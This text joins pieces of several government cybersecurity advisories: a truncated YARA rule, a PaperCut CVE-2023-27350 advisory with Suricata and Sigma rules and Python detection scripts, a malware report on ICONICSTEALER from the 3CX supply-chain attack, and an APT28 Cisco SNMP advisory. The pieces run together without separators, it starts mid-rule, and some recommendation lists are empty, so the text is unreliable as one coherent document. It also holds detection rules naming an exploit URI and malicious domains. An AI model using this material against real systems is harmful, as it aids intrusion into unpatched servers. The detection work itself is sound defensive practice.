        $s1 = "%!PS-Adobe-" nocase ascii wide
        $s2 = "github.com/fatedier/frp/cmd/frpc" nocase ascii wide
        $s3 = "github.com/fatedier/frp/cmd/frpc/sub.startService" nocase ascii wide
        $s4 = "HTTP_PROXYHost: %s" nocase ascii wide
    condition:
        3 of them
}
Active Directory and domain controller hardening:
CISA regional cyber threats:
Microsoft Threat Intelligence blog:
Ntdsutil.exe:
PowerShell:
Windows command line process auditing:
Windows Defender Firewall:
Windows management instrumentation:
Windows password spraying:
The NSA Cybersecurity Collaboration Center, along with the authoring agencies, acknowledge Amazon Web Services (AWS) Security, Broadcom, Cisco Talos, Google's Threat Analysis Group, Lumen Technologies, Mandiant, Microsoft Threat Intelligence (MSTI), Palo Alto Networks, SecureWorks, SentinelOne, Trellix, and additional industry partners for their collaboration on this advisory.
The information and opinions contained in this document are provided "as is" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise does not constitute or imply its endorsement, recommendation, or favoring by the authoring agencies' governments, and this guidance shall not be used for advertising or product endorsement purposes.
Active Directory®, Microsoft®, PowerShell®, and Windows® are registered trademarks of Microsoft Corporation. MITRE® and ATT&CK® are registered trademarks of The MITRE Corporation.
This document was developed in furtherance of the authoring agencies’ cybersecurity missions, including their responsibilities to identify and disseminate threats, and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.
U.S. organizations: Urgently report any anomalous activity or incidents, including based upon technical information associated with this Cybersecurity Advisory, to CISA at Report@cisa.dhs.gov or cisa.gov/report or to the FBI via your local FBI field office listed at https://www.fbi.gov/contact-us/field-offices.
NSA Cybersecurity Report Questions and Feedback: CybersecurityReports@nsa.gov
NSA Defense Industrial Base Inquiries and Cybersecurity Services: DIB_Defense@cyber.nsa.gov
NSA Media Inquiries / Press Desk: 443-634-0721, MediaRelations@nsa.gov
Australian organizations: Visit cyber.gov.au or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and to access alerts and advisories.
Canadian organizations: Report incidents by emailing CCCS at contact@cyber.gc.ca.
New Zealand organizations: Report cyber security incidents to incidents@ncsc.govt.nz or call 04 498 7654.
United Kingdom organizations: Report a significant cyber security incident at ncsc.gov.uk/report-an-incident (monitored 24 hours) or, for urgent assistance, call 03000 200 973.
Table 2 captures all referenced threat actor tactics and techniques in this advisory.
Tactic | Technique Title | ID | Use
---|---|---|---
Initial Access | Exploit Public-facing Application | T1190 | Actor used public-facing applications to gain initial access to systems; in this case, Earthworm and PortProxy.
Execution | Windows Management Instrumentation | T1047 | The actor executed WMIC commands to create a copy of the SYSTEM registry.
Execution | Command and Scripting Interpreter: PowerShell | T1059.001 | The actor used a PowerShell command to identify successful logons to the host.
Execution | Command and Scripting Interpreter: Windows Command Shell | T1059.003 | The actor used this primary command prompt to execute a query that collected information about the storage devices on the local host.
Persistence | Server Software Component: Web Shell | T1505.003 | The actor used backdoor web servers with web shells to establish persistence to systems, including some of the webshells being derived from Awen webshell.
Defense Evasion | Hide Artifacts | T1564 | The actor selectively cleared Windows Event Logs, system logs, and other technical artifacts to remove evidence of their intrusion activity.
Defense Evasion | Indicator Removal: Clear Windows Event Logs | T1070.001 | The actor cleared system event logs to hide activity of an intrusion.
Credential Access | OS Credential Dumping: NTDS | T1003.003 | The actor may try to exfiltrate the ntds.dit file and the SYSTEM registry hive out of the network to perform password cracking.
Credential Access | Brute Force | T1110 | The actor attempted to gain access to accounts with multiple password attempts.
Credential Access | Brute Force: Password Spraying | T1110.003 | The actor used commonly used passwords against accounts to attempt to acquire valid credentials.
Credential Access | OS Credential Dumping | T1003 | The actor used additional commands to obtain credentials in the environment.
Credential Access | Credentials from Password Stores | T1555 | The actors searched for common password storage locations.
Discovery | System Information Discovery | T1082 | The actors executed commands to gather information about local drives.
Discovery | System Owner/User Discovery | T1033 | The actors gathered information about successful logons to the host using a PowerShell command.
Discovery | Permission Groups Discovery: Local Groups | T1069.001 | The actors attempt to find local system groups and permission settings.
Discovery | Permission Groups Discovery: Domain Groups | T1069.002 | The actors used commands to enumerate the active directory structure.
Discovery | System Network Configuration Discovery | T1016 | The actors used commands to enumerate the network topology.
Command and Control | Proxy | T1090 | The actors used commands to enable port forwarding on the host.
Command and Control | Proxy: External Proxy | T1090.002 | The actors used compromised SOHO devices (e.g. routers) to obfuscate the source of their activity.
The Federal Bureau of Investigation (FBI) and Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint Cybersecurity Advisory (CSA) in response to the active exploitation of CVE-2023-27350. This vulnerability occurs in certain versions of PaperCut NG and PaperCut MF and enables an unauthenticated actor to execute malicious code remotely without credentials. PaperCut released a patch in March 2023.
According to FBI observed information, malicious actors exploited CVE-2023-27350 beginning in mid-April 2023 and continuing through the present. In early May 2023, also according to FBI information, a group self-identifying as the Bl00dy Ransomware Gang attempted to exploit vulnerable PaperCut servers against the Education Facilities Subsector.
This joint advisory provides detection methods for exploitation of CVE-2023-27350 as well as indicators of compromise (IOCs) associated with Bl00dy Ransomware Gang activity. FBI and CISA strongly encourage users and administrators to immediately apply patches, and workarounds if unable to patch. FBI and CISA especially encourage organizations who did not patch immediately to assume compromise and hunt for malicious activity using the detection signatures in this CSA. If potential compromise is detected, organizations should apply the incident response recommendations included in this CSA.
CVE-2023-27350 allows a remote actor to bypass authentication and conduct remote code execution on the following affected installations of PaperCut:[1]
PaperCut servers vulnerable to CVE-2023-27350 implement improper access controls in the SetupCompleted Java class, allowing malicious actors to bypass user authentication and access the server as an administrator. After accessing the server, actors can leverage existing PaperCut software features for remote code execution (RCE). There are currently two publicly known proofs of concept for achieving RCE in vulnerable PaperCut software:
FBI and CISA note that actors may develop other methods for RCE.
The PaperCut server process pc-app.exe runs with SYSTEM- or root-level privileges. When the software is exploited to execute other processes such as cmd.exe or powershell.exe, these child processes are created with the same privileges. Commands supplied with the execution of these processes will also run with the same privileges. As a result, a wide range of post-exploitation activity is possible following initial access and compromise.
This CVE was added to CISA’s Known Exploited Vulnerabilities (KEV) Catalog on April 21, 2023.
Education Facilities Subsector entities maintained approximately 68% of exposed, but not necessarily vulnerable, U.S.-based PaperCut servers. In early May 2023, according to FBI information, the Bl00dy Ransomware Gang gained access to victim networks across the Education Facilities Subsector where PaperCut servers vulnerable to CVE-2023-27350 were exposed to the internet. Ultimately, some of these operations led to data exfiltration and encryption of victim systems. The Bl00dy Ransomware Gang left ransom notes on victim systems demanding payment in exchange for decryption of encrypted files (see Figure 1).
According to FBI information, legitimate remote management and maintenance (RMM) software was downloaded and executed on victim systems via commands issued through PaperCut’s print scripting interface. External network communications through Tor and/or other proxies from inside victim networks helped Bl00dy Ransomware Gang actors mask their malicious network traffic. The FBI also identified information relating to the download and execution of command and control (C2) malware such as DiceLoader, TrueBot, and Cobalt Strike Beacons, although it is unclear at which stage in the attack these tools were executed.
Network defenders should focus detection efforts on three key areas:
- Network traffic attempting to access the SetupCompleted page of an exposed and vulnerable PaperCut server.
- Child processes spawned from a PaperCut server's pc-app.exe process.
- Unexpected changes to PaperCut server settings and corresponding entries in the PaperCut Application Server logs.

To exploit CVE-2023-27350, a malicious actor must first visit the SetupCompleted page of the intended target, which will provide the adversary with authentication to the targeted PaperCut server. Deploy the following Emerging Threat Suricata signatures to detect when GET requests are sent to the SetupCompleted page. (Be careful of improperly formatted double-quotation marks if copying and pasting signatures from this advisory.)
Note that some of the techniques identified in this section can affect the availability or stability of a system. Defenders should follow organizational policies and incident response best practices to minimize the risk to operations while threat hunting.
alert http any any -> $HOME_NET any (msg:"ET EXPLOIT PaperCut MF/NG SetupCompleted Authentication Bypass (CVE-2023-27350)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/app?service=page/SetupCompleted"; bsize:32; fast_pattern; reference:cve,2023-27350; classtype:attempted-admin;)
alert http any any -> $HOME_NET any (msg:"ET EXPLOIT PaperCut MF/NG SetupCompleted Authentication Bypass (CVE-2023-27350)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"page/SetupCompleted"; fast_pattern; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; reference:cve,2023-27350; classtype:attempted-admin; metadata:attack_target Server, cve CVE_2023_27350, deployment Perimeter, deployment Internal, deployment SSLDecrypt, former_category EXPLOIT, performance_impact Low, confidence High, signature_severity Major, updated_at 2023_05_05;)
Note that these signatures and other rule-based detections, including YARA rules, may fail to detect more advanced iterations of CVE-2023-27350 exploits. Actors are known to adapt exploits to circumvent rule-based detections formulated for the original iterations of exploits observed in the wild. For example, the first rule above detected some of the first known exploits of CVE-2023-27350, but a slight modification of the exploit’s GET request can evade that rule. The second rule was designed to detect a broader range of activity than the first rule.
The following additional Emerging Threat Suricata signatures are designed to detect Domain Name System (DNS) lookups of known malicious domains associated with recent PaperCut exploitation:
alert dns $HOME_NET any -> any any (msg:"ET TROJAN Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (windowcsupdates .com)"; dns_query; content:"windowcsupdates.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|.)windowcsupdates.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)
alert dns $HOME_NET any -> any any (msg:"ET ATTACK_RESPONSE Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (anydeskupdate .com)"; dns_query; content:"anydeskupdate.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|.)anydeskupdate.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)
alert dns $HOME_NET any -> any any (msg:"ET TROJAN Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (anydeskupdates .com)"; dns_query; content:"anydeskupdates.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|.)anydeskupdates.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)
alert dns $HOME_NET any -> any any (msg:"ET TROJAN Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (windowservicecemter .com)"; dns_query; content:"windowservicecemter.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|.)windowservicecemter.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)
alert dns $HOME_NET any -> any any (msg:"ET ATTACK_RESPONSE Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (winserverupdates .com)"; dns_query; content:"winserverupdates.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|.)winserverupdates.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)
alert dns $HOME_NET any -> any any (msg:"ET TROJAN Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (netviewremote .com)"; dns_query; content:"netviewremote.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|.)netviewremote.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)
alert dns $HOME_NET any -> any any (msg:"ET TROJAN Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (updateservicecenter .com)"; dns_query; content:"updateservicecenter.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|.)updateservicecenter.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)
alert dns $HOME_NET any -> any any (msg:"ET TROJAN Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (windowservicecenter .com)"; dns_query; content:"windowservicecenter.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|.)windowservicecenter.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category MALWARE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)
alert dns $HOME_NET any -> any any (msg:"ET TROJAN Possible PaperCut MF/NG Post Exploitation Domain in DNS Lookup (windowservicecentar .com)"; dns_query; content:"windowservicecentar.com"; nocase; isdataat:!1,relative; pcre:"/(?:^|.)windowservicecentar.com$/"; reference:url,www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software; classtype:trojan-activity; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, former_category ATTACK_RESPONSE, performance_impact Low, signature_severity Major, updated_at 2023_04_21;)
Note that these signatures may also not work if the actor modified activity to evade detection by known rules.
A child process is spawned under pc-app.exe, the PaperCut server process, when the vulnerable PaperCut software is used to execute another process. Malicious activity against PaperCut servers in mid-April used the RCE to supply commands to a cmd.exe or powershell.exe child process, which were then used to conduct further network exploitation. The following Sigma detection rule may detect this malicious activity [2].
title: PaperCut MF/NG Vulnerability
authors: Huntress DE&TH Team
description: Detects suspicious code execution from vulnerable PaperCut versions MF and NG
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\pc-app.exe'
        Image|endswith:
            - '\cmd.exe'
            - '\powershell.exe'
    condition: selection
level: high
falsepositives:
    - Expected admin activity
More advanced versions of the exploit can drop a backdoor executable, use living-off-the-land binaries, or attempt to evade the rule above by spawning an additional child process in between pc-app.exe and a command-line interpreter.
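The rule's parent/child logic applied to constructed process-creation events, as an added example that is not part of the advisory or the Huntress rule. It also goes one step beyond the rule by walking the full ancestor chain, so an extra process inserted between pc-app.exe and the interpreter is still flagged; the events, image paths and the intermediate stage.exe are constructed, and field names follow Sysmon/Sigma conventions.

```python
"""Apply the pc-app.exe parent/child logic of the Sigma rule to constructed
Windows process-creation events, then extend it to the full ancestor chain.

Added example; events and paths are constructed, not real telemetry.
"""
from typing import Dict, List, Optional, Tuple

PAPERCUT_SERVER = "\\pc-app.exe"
INTERPRETERS = ("\\cmd.exe", "\\powershell.exe")

Event = Dict[str, object]

# Constructed sample telemetry. PID 400 is a powershell.exe whose immediate
# parent is a staged executable (constructed name), not pc-app.exe.
EVENTS: List[Event] = [
    {"ProcessId": 100, "ParentProcessId": 4,
     "Image": "C:\\Program Files\\PaperCut MF\\server\\bin\\win\\pc-app.exe",
     "ParentImage": "C:\\Windows\\System32\\services.exe"},
    {"ProcessId": 200, "ParentProcessId": 100,
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Program Files\\PaperCut MF\\server\\bin\\win\\pc-app.exe"},
    {"ProcessId": 300, "ParentProcessId": 100,
     "Image": "C:\\Windows\\Temp\\stage.exe",
     "ParentImage": "C:\\Program Files\\PaperCut MF\\server\\bin\\win\\pc-app.exe"},
    {"ProcessId": 400, "ParentProcessId": 300,
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "ParentImage": "C:\\Windows\\Temp\\stage.exe"},
    {"ProcessId": 500, "ParentProcessId": 50,
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\explorer.exe"},
]


def _endswith_ci(value: object, suffixes) -> bool:
    """Sigma's 'endswith' modifier is case-insensitive by default."""
    if not isinstance(value, str):
        return False
    return value.lower().endswith(tuple(s.lower() for s in suffixes))


def sigma_match(event: Event) -> bool:
    """Direct translation of the rule: ParentImage endswith \\pc-app.exe
    AND Image endswith \\cmd.exe or \\powershell.exe."""
    return (_endswith_ci(event.get("ParentImage"), (PAPERCUT_SERVER,))
            and _endswith_ci(event.get("Image"), INTERPRETERS))


def ancestor_depth(event: Event, by_pid: Dict[int, Event],
                   max_depth: int = 8) -> Optional[int]:
    """Return how many hops up the parent chain pc-app.exe sits, or None.
    Depth 1 is the immediate parent, which the Sigma rule already covers."""
    if not _endswith_ci(event.get("Image"), INTERPRETERS):
        return None
    parent = by_pid.get(event["ParentProcessId"])
    depth = 1
    while parent is not None and depth <= max_depth:
        if _endswith_ci(parent.get("Image"), (PAPERCUT_SERVER,)):
            return depth
        parent = by_pid.get(parent["ParentProcessId"])
        depth += 1
    return None


def find_suspicious(events: List[Event]) -> List[Tuple[int, str]]:
    """Return (ProcessId, reason) for interpreters descending from pc-app.exe."""
    by_pid = {int(e["ProcessId"]): e for e in events}
    hits: List[Tuple[int, str]] = []
    for ev in events:
        if sigma_match(ev):
            hits.append((int(ev["ProcessId"]), "direct child of pc-app.exe (Sigma rule)"))
            continue
        depth = ancestor_depth(ev, by_pid)
        if depth is not None:
            hits.append((int(ev["ProcessId"]), f"pc-app.exe is an ancestor {depth} hops up"))
    return hits


if __name__ == "__main__":
    for pid, reason in find_suspicious(EVENTS):
        print(pid, reason)
```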
Network defenders may be able to identify suspicious activity by reviewing the PaperCut server options to identify unfamiliar print scripts or User/Group Sync settings.
If the PaperCut Application Server logs have debug mode enabled, lines containing SetupCompleted at a time that does not correlate with the server installation or upgrade may indicate a compromise. Server logs can be found in [app-path]/server/logs/*.* where server.log is normally the most recent log file.
Any of the following server log entries may be indicative of a compromise:
User "admin" updated the config key "print.script.sandboxed"
User "admin" updated the config key "device.script.sandboxed"
Admin user "admin" modified the print script on printer
User/Group Sync settings changed by "admin"
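A scanner for the two kinds of server.log entry described above (SetupCompleted activity outside an install/upgrade window, and the "admin" configuration, print-script and User/Group Sync changes), as an added example that is not part of the advisory. The log lines are constructed, and the install/upgrade and page-access wording in the two marker regexes is an assumption to adjust to your deployment.

```python
"""Scan PaperCut Application Server log lines for the indicators listed in
the advisory. Added example; log lines below are constructed.
"""
import re
from datetime import datetime, timedelta
from typing import List, Optional, Tuple

# Constructed sample of [app-path]/server/logs/server.log content.
SAMPLE_LOG = """\
2023-03-10 09:02:11,101 INFO  Application Server upgrade completed
2023-03-10 09:02:12,005 DEBUG Requested page: SetupCompleted
2023-04-18 02:14:37,882 DEBUG Requested page: SetupCompleted
2023-04-18 02:14:40,110 INFO  User "admin" updated the config key "print.script.sandboxed"
2023-04-18 02:15:02,310 INFO  Admin user "admin" modified the print script on printer "HQ-Floor2"
2023-04-18 02:16:45,000 INFO  User/Group Sync settings changed by "admin"
2023-04-18 08:30:00,000 INFO  User "jdoe" printed 3 pages on "HQ-Floor2"
"""

TIMESTAMP = re.compile(r"^(\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})")
# Markers for legitimate SetupCompleted activity (assumed wording).
MAINTENANCE = re.compile(r"(installation|upgrade) completed", re.I)
SETUP_PAGE = re.compile(r"SetupCompleted")
# How long after an install/upgrade a SetupCompleted hit is still expected.
MAINTENANCE_WINDOW = timedelta(hours=1)

# Entries the advisory lists as possible indicators of compromise.
ADMIN_CHANGES = [
    (re.compile(r'User "admin" updated the config key "(?:print|device)\.script\.sandboxed"'),
     "script sandboxing toggled by admin"),
    (re.compile(r'Admin user "admin" modified the print script on printer'),
     "print script modified by admin"),
    (re.compile(r'User/Group Sync settings changed by "admin"'),
     "User/Group Sync settings changed by admin"),
]


def _ts(line: str) -> Optional[datetime]:
    m = TIMESTAMP.match(line)
    return datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S") if m else None


def scan(log_text: str) -> List[Tuple[str, str]]:
    """Return (timestamp, reason) for each suspicious line, in log order."""
    lines = [l for l in log_text.splitlines() if l.strip()]
    # First pass: when did legitimate installs/upgrades happen?
    maint_times = [t for t in (_ts(l) for l in lines if MAINTENANCE.search(l)) if t]
    window = MAINTENANCE_WINDOW.total_seconds()
    findings: List[Tuple[str, str]] = []
    for line in lines:
        when = _ts(line)
        if when is None:
            continue
        stamp = when.isoformat(sep=" ")
        if SETUP_PAGE.search(line) and not MAINTENANCE.search(line):
            expected = any(0 <= (when - t).total_seconds() <= window for t in maint_times)
            if not expected:
                findings.append((stamp, "SetupCompleted outside install/upgrade window"))
        for pattern, reason in ADMIN_CHANGES:
            if pattern.search(line):
                findings.append((stamp, reason))
    return findings


if __name__ == "__main__":
    for stamp, reason in scan(SAMPLE_LOG):
        print(stamp, reason)
```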
See Table 1 through Table 6 for IOCs obtained from FBI investigations and open-source information as of early May 2023.
If compromise is suspected or detected, organizations should:
FBI and CISA recommend organizations:
ACKNOWLEDGMENTS
The Multi-State Information Sharing and Analysis Center (MS-ISAC) contributed to this advisory.
REFERENCES
[1] PaperCut: URGENT | PaperCut MF/NG vulnerability bulletin (March 2023)
[2] Huntress: Critical Vulnerabilities in PaperCut Print Management Software
This product is provided subject to this Notification and this Privacy & Use policy.
Notification
This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise. This document is marked TLP:CLEAR--Disclosure is not limited. Sources may use TLP:CLEAR when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:CLEAR information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.

Summary
Description
This submission included one unique file. This file has been identified as a variant of the malware known as ICONICSTEALER. This variant of malware was utilized in the supply chain attack on the commercial software 3CXDesktopApp. The primary purpose of this malware is to steal sensitive data from a victim user's web browser and make it available for exfiltration by a separate malicious component.
MAR-10435108-1.v1 ICONICSTEALER (PDF, 1.38 MB)
Submitted Files (1)
e2ef455e92b3cb5a4c0f3093191d0bfb4fe3ff961e2a403feaa26060a298c70f (infostealer.dll)

Findings
e2ef455e92b3cb5a4c0f3093191d0bfb4fe3ff961e2a403feaa26060a298c70f

Tags
backdoor information-stealer trojan

Details
Antivirus
YARA Rules
ssdeep Matches
No matches found.

Description
This file is a 64-bit Windows DLL (Dynamic-link Library). Analysis indicates this application was part of a supply chain attack against the commercial application 3CXDesktopApp. This malicious DLL was included within an installer for the 3CXDesktopApp. The primary purpose of this DLL is to steal information from various web browsers employed by a victim user. This malware is being referred to in open source as ICONICSTEALER. During runtime the application first attempts to read a file named "\3CXDesktopApp\config.json". Additionally, the malware attempts to collect the victim system's hostname, domain name, and OS version (Figure 1). The malicious application next attempts to steal sensitive information from the victim user's web browser. Specifically, it will target the Chrome, Edge, Brave, or Firefox browsers (Figure 2). It uses an embedded SQLite library to query the browser databases for sensitive information (Figure 3). Analysis indicates the data stolen from the web browsers will be websites recently visited, including sensitive parameters passed to the sites. These parameters could include sensitive information such as login credentials or credit card numbers. No exfiltration capability was discovered within this malicious application, indicating it works with another malicious component to exfiltrate collected data.

Screenshots
Figure 1 - This screenshot illustrates this malware attempting to access the file \3CXDesktopApp\config.json.
Figure 2 - This screenshot illustrates web browsers targeted by this malware, known as ICONICSTEALER.
Figure 3 - This screenshot illustrates the malware beginning to search through folders of various web browsers looking for the database files. The database files will be queried with an embedded SQLite library looking for sensitive information.
Figure 4 - This screenshot indicates the malware "backs up" the web browser databases before querying them for sensitive information. It may do this to prevent accidental corruption of the databases, or to prevent the browser from crashing if the user is currently browsing the web.

Recommendations
CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.
Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".
ACKNOWLEDGEMENTS
SentinelOne contributed to this report.
The UK National Cyber Security Centre (NCSC), the US National Security Agency (NSA), US Cybersecurity and Infrastructure Security Agency (CISA) and US Federal Bureau of Investigation (FBI) are releasing this joint advisory to provide details of tactics, techniques and procedures (TTPs) associated with APT28’s exploitation of Cisco routers in 2021.
We assess that APT28 is almost certainly the Russian General Staff Main Intelligence Directorate (GRU) 85th Special Service Centre (GTsSS) Military Intelligence Unit 26165. APT28 (also known as Fancy Bear, STRONTIUM, Pawn Storm, the Sednit Gang and Sofacy) is a highly skilled threat actor.
The NCSC has previously attributed the following activity to APT28:
For more information on APT28 activity, see the advisory Russian State-Sponsored and Criminal Cyber Threats to Critical Infrastructure and Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments.
As of 2021, APT28 has been observed using commercially available code repositories, and post-exploit frameworks such as Empire. This included the use of PowerShell Empire, in addition to Python versions of Empire.
In 2021, APT28 used infrastructure to mask Simple Network Management Protocol (SNMP) access to Cisco routers worldwide. This included a small number based in Europe, US government institutions, and approximately 250 Ukrainian victims.
SNMP is designed to allow network administrators to monitor and configure network devices remotely, but it can also be misused to obtain sensitive network information and, if vulnerable, exploit devices to penetrate a network.
A number of software tools can scan the entire network using SNMP, meaning that poor configuration such as using default or easy-to-guess community strings, can make a network susceptible to attacks.
Weak SNMP community strings, including the default "public," allowed APT28 to gain access to router information. APT28 sent additional SNMP commands to enumerate router interfaces. [T1078.001]
The compromised routers were configured to accept SNMP v2 requests. SNMP v2 does not support encryption, so all data, including community strings, is sent unencrypted.
Exploitation of CVE-2017-6742
APT28 exploited the vulnerability CVE-2017-6742 (Cisco Bug ID: CSCve54313) [T1190]. This vulnerability was first announced by Cisco on 29 June 2017, and patched software was made available.
Cisco's published advisory provided workarounds, such as limiting access to SNMP from trusted hosts only, or by disabling a number of SNMP Management Information bases (MIBs).
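An audit of a Cisco IOS running-config excerpt for the weaknesses described above (default or guessable community strings, v1/v2c communities that no access list restricts to trusted hosts, read-write communities, and the absence of an SNMPv3 priv group), as an added example that is not from the advisory or Cisco. The configuration text is constructed, and WEAK_COMMUNITIES is a starting list you should extend.

```python
"""Audit Cisco IOS SNMP configuration lines for the weaknesses this advisory
describes. Added example; the config below is constructed, not a real device.
"""
import re
from typing import List, Tuple

WEAK_COMMUNITIES = {"public", "private", "cisco", "admin", "snmp"}

# Constructed running-config excerpt. The ACL 99 restricts SNMP to one host,
# which is the "trusted hosts only" workaround from Cisco's advisory.
CONSTRUCTED_CONFIG = """\
hostname edge-rtr-01
!
access-list 99 permit 10.20.30.5
access-list 99 deny   any
!
snmp-server community public RO
snmp-server community Pr1vate-Ops RW
snmp-server community mon1tor-only RO 99
snmp-server community legacy-ro RO 42
snmp-server group NOCV3 v3 priv
snmp-server user nocuser NOCV3 v3 auth sha AuthPassw0rd priv aes 128 PrivPassw0rd
"""

# snmp-server community <string> [view <name>] {RO|RW} [<acl>]
COMMUNITY = re.compile(
    r"^snmp-server community (\S+)(?: view \S+)? (RO|RW)(?: (\S+))?\s*$", re.I | re.M)
ACL_DEF = re.compile(
    r"^(?:access-list (\S+)|ip access-list (?:standard|extended) (\S+))", re.I | re.M)
V3_PRIV_GROUP = re.compile(r"^snmp-server group \S+ v3 priv", re.I | re.M)

Finding = Tuple[str, str]   # (community name or '*' for device-wide, issue)


def audit(config: str) -> List[Finding]:
    """Return one finding per SNMP weakness found in the configuration."""
    defined_acls = {a or b for a, b in ACL_DEF.findall(config)}
    findings: List[Finding] = []
    for name, mode, acl in COMMUNITY.findall(config):
        if name.lower() in WEAK_COMMUNITIES:
            findings.append((name, "default or guessable community string"))
        if mode.upper() == "RW":
            findings.append((name, "read-write community permits configuration changes"))
        if not acl:
            findings.append((name, "no access-list restricts SNMP source hosts"))
        elif acl not in defined_acls:
            # A dangling ACL reference leaves the community unrestricted in practice.
            findings.append((name, f"access-list {acl} is referenced but not defined"))
    if not V3_PRIV_GROUP.search(config):
        findings.append(("*", "no SNMPv3 priv group; v1/v2c community strings travel in clear text"))
    return findings


if __name__ == "__main__":
    for who, issue in audit(CONSTRUCTED_CONFIG):
        print(f"{who:<14} {issue}")
```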
For some of the targeted devices, APT28 actors used an SNMP exploit to deploy malware, as detailed in the NCSC’s Jaguar Tooth Malware Analysis Report. This malware obtained further device information, which was exfiltrated over Trivial File Transfer Protocol (TFTP), and enabled unauthenticated access via a backdoor.
The actor obtained this device information by executing a number of Command Line Interface (CLI) commands via the malware. This included discovery of other devices on the network by querying the Address Resolution Protocol (ARP) table to obtain MAC addresses. [T1590]
Please refer to the accompanying Malware Analysis Report for indicators of compromise which may help to detect this activity.
This advisory has been compiled with respect to the MITRE ATT&CK® framework, a globally accessible knowledge base of adversary tactics and techniques based on real-world observations.
For detailed TTPs, see the Malware Analysis Report.
Tactic | ID | Technique | Procedure |
---|---|---|---|
Initial Access | T1190 | Exploit Public-facing Application | APT28 exploited default/well-known community strings in SNMP as outlined in CVE-2017-6742 (Cisco Bug ID: CSCve54313). |
Initial Access | T1078.001 | Valid Accounts: Default Accounts | Actors accessed victim routers by using default community strings such as “public.” |
Reconnaissance | T1590 | Gather Victim Network Information | Access was gained to perform reconnaissance on victim devices. Further detail of how this was achieved is available in the MITRE ATT&CK section of the Jaguar Tooth MAR. |
